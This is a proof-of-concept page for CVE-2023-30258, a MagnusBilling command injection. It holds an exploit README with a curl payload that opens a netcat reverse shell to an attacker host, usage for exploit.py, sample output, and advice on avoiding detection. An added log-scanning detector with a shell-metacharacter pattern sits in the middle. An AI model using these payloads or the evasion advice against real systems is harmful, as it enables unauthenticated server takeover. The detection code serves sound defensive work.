POC details: 6b7ffe54b5ec159aa9e83871ea8950dc3794aa49

Source
Related vulnerability
Title: MagnusBilling OS command injection vulnerability (CVE-2023-30258)
Description: MagnusBilling is a fast, secure, efficient and highly available open-source VoIP billing system from MagnusSolution. MagnusSolution MagnusBilling 6.x and 7.x contain an OS command injection vulnerability: the application lets a remote attacker run arbitrary commands through an unauthenticated HTTP request.
Introduction
# Magnus Billing System v7 Exploit

This Python script automates the exploitation of a command injection vulnerability in Magnus Billing System v7, specifically in the `icepay.php` script located at `/mbilling/lib/icepay/icepay.php`. The exploit leverages the `democ` parameter to execute arbitrary commands on the target system, ultimately establishing a reverse shell to an attacker-controlled machine.

## Vulnerability Overview

The vulnerability allows unauthenticated command injection via a crafted GET request. The original proof-of-concept (PoC) used the following `curl` command:

```bash
curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'
```

This script automates that process, making it configurable via command-line arguments.
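The crafted GET request described above leaves a recognizable trace in the web server's access log. The following Python script is an added detection example, not part of this repository or of MagnusBilling: it parses access-log lines in the Apache/Nginx "combined" format (an assumed layout), URL-decodes the query string, and flags requests to `/mbilling/lib/icepay/icepay.php` whose `democ` parameter contains shell metacharacters. The sample log lines, IP addresses and timestamps are constructed for the example.

```python
#!/usr/bin/env python3
"""Access-log detection for CVE-2023-30258 style command injection attempts.

Added example, not code from the exploit repository. Assumes the
Apache/Nginx "combined" log layout; adjust LOG_RE for other formats.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: ip ident user [ts] "METHOD uri PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

VULN_PATH = "/mbilling/lib/icepay/icepay.php"
VULN_PARAM = "democ"

# Tokens that let a parameter value break out of a shell command line.
# A legitimate request would carry no shell syntax in this field.
SHELL_META = re.compile(r'[;&|`$<>]|\$\(|\bmkfifo\b|\bnc\b|\bsh -i\b')


def classify_line(line):
    """Return a finding dict if the line looks like an injection attempt, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("uri"))
    if parts.path != VULN_PATH:
        return None
    # parse_qs URL-decodes, so %3B / %7C are inspected as ';' and '|'
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get(VULN_PARAM, []):
        if SHELL_META.search(value):
            return {
                "src_ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "status": int(m.group("status")),
                "democ": value,
            }
    return None


def scan(lines):
    """Scan an iterable of log lines and return every finding."""
    return [f for f in map(classify_line, lines) if f is not None]


# Constructed sample log lines (not real traffic). The first reproduces the
# shape of the PoC request, percent-encoded the way a web server logs it;
# the attacker IP 198.51.100.7 is a documentation-range placeholder.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /mbilling/lib/icepay/icepay.php'
    '?democ=%3Brm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7Csh+-i+2%3E%261'
    '%7Cnc+198.51.100.7+443+%3E%2Ftmp%2Ff%3B HTTP/1.1" 200 0 "-" "curl/8.0.1"',
    '198.51.100.20 - - [10/Oct/2023:14:01:02 +0000] "GET /mbilling/lib/icepay/icepay.php'
    '?democ=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [10/Oct/2023:14:02:10 +0000] "GET /mbilling/index.php/'
    'authentication/login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[ALERT] {f['timestamp']} {f['src_ip']} democ={f['democ']!r}")
```

Because the check runs on the decoded parameter value, percent-encoded separators are caught the same as literal ones. The same path-plus-metacharacter rule can be carried over into a WAF or SIEM signature; the script's second sample line shows the benign case that should not alert.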

## Features

- **Configurable**: Specify the target IP, attacker IP, and port via command-line arguments
- **Simple**: Uses the `requests` library to send the HTTP request with the payload
- **Feedback**: Provides clear output to track the exploit's progress

## Prerequisites

- **Python 3.x**: Ensure Python 3 is installed on your system
- **Requests Library**: Install the `requests` Python module:
  ```bash
  pip install requests
  ```
- **Netcat**: The target system must have `netcat` (`nc`) installed for the reverse shell to work
- **Listener**: Set up a `netcat` listener on the attacker machine to catch the reverse shell
- **Vulnerable Target**: The target must be running Magnus Billing System v7 with the vulnerable `icepay.php` script accessible

## Usage

### Setup

1. **Clone or Download**: Save the script as `exploit.py`
2. **Set Up Listener**: On your attacker machine, start a `netcat` listener:
   ```bash
   nc -lvnp <PORT>
   ```
   Replace `<PORT>` with your chosen port (e.g., `443`)

### Running the Exploit

```bash
python exploit.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>
```

**Parameters:**
- `-t, --target`: IP address of the target Magnus Billing System
- `-a, --attacker`: Your IP address to receive the reverse shell
- `-p, --port`: Port on your machine for the reverse shell

### Example

```bash
python exploit.py -t 10.10.160.86 -a 10.8.64.79 -p 443
```

**Expected Output:**
```
=== Magnus Billing System v7 Exploit ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.10.160.86/mbilling/lib/icepay/icepay.php
[+] Attacker: 10.8.64.79:443
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.64.79 443 >/tmp/f;
[+] Request sent successfully!
[*] Check your netcat listener (e.g., 'nc -lvnp 443') for a shell.
```

3. **Catch the Shell**: Switch to your `netcat` listener to interact with the reverse shell if successful

## Technical Notes

- **Payload Type**: The script uses a FIFO-based reverse shell (`mkfifo`) with `netcat`
- **Error Handling**: Basic checks for network errors and invalid ports are included
- **Debugging**: To inspect the server's response, uncomment `print(response.text)` in the `exploit()` function
- **Alternative Payloads**: The script can be modified to use different reverse shell payloads if needed

## Troubleshooting

- If the connection fails, verify that:
  - The target system has `netcat` installed
  - No firewall is blocking the connection
  - The correct ports are being used
  - The target has not been patched

## Security Considerations

- Consider using SSH tunneling or a VPN when using this exploit to avoid detection
- The payload might trigger security monitoring systems

## Disclaimer

This tool is provided for **educational and security testing purposes only**. Use it only on systems you have explicit permission to test. Unauthorized use against systems you do not own or have consent to test is illegal and unethical. The author is not responsible for any misuse or damage caused by this script.

## License

This project is released under the MIT License. Feel free to modify and distribute it as needed, keeping the disclaimer intact.

## Contributing

Contributions, bug reports, and feature requests are welcome. Please feel free to submit a pull request or open an issue.
File snapshot

```
[4.0K] /data/pocs/6b7ffe54b5ec159aa9e83871ea8950dc3794aa49
├── [2.7K] exploit.py
└── [4.1K] README.md

0 directories, 2 files
```